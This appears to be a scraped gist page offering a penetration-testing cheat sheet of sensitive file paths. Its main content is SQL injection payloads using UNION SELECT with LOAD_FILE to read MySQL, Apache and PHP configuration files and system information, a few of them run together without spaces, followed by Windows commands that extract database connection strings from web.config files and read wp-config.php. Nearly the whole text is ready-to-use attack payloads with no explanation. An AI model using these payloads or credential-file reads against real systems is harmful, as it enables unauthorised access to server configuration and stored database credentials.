You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Windows & Linux sensitive file paths for penetration testing - includes webroot locations, config files, logs, and SQL injection LOAD_FILE payloads for common services (IIS, Apache, Nginx, XAMPP, WAMP, Jenkins, FTP, SSH)
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/mysql/my.cnf')#c'UNION ALLSELECT1,2,3,4,LOAD_FILE('/etc/apache2/apache2.conf')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/apache2/sites-enabled/000-default.conf')#c'UNION ALLSELECT1,2,3,4,LOAD_FILE('/etc/php/7.4/apache2/php.ini')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/php/8.1/apache2/php.ini')#c'UNION ALLSELECT1,2,3,4,LOAD_FILE('/proc/version')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/os-release')#c'UNION ALLSELECT1,2,3,4,LOAD_FILE('/etc/mysql/mariadb.conf.d/50-server.cnf')#
Useful Commands
Windows
type C:\inetpub\wwwroot\web.config | findstr connectionString
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
type C:\wamp\app\wordpress\wp-config.php
type C:\wamp\alias\phpmyadmin.conf